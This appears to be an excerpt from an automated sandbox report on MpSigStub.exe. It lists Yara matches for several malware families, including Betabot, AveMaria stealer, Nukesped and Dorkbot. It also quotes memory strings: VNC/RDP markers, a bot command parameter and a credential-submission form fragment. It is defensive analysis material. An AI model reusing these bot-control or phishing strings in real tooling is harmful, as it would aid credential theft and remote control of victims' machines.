Source: Yara match File source: 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Betabot
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Nukesped
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Codoso Ghost
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Growtopia
Source: Yara match File source: 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Dorkbot
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Contains VNC / remote desktop functionality (version string found)
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: rfb 003.008
Source: MpSigStub.exe, 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp String found in binary or memory: RFB 003.008
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: wfreerdp.dll
Yara detected RemCom RemoteAdmin tool
Source: Yara match File source: 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18333848371.0000015B1A546000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Contains strings related to BOT control commands
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: cmd=getload&login=
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: .php?cmd=login_submit&id=$praga$praga&session=$praga$praganame=chalbhaiid=chalbhaimethod=post>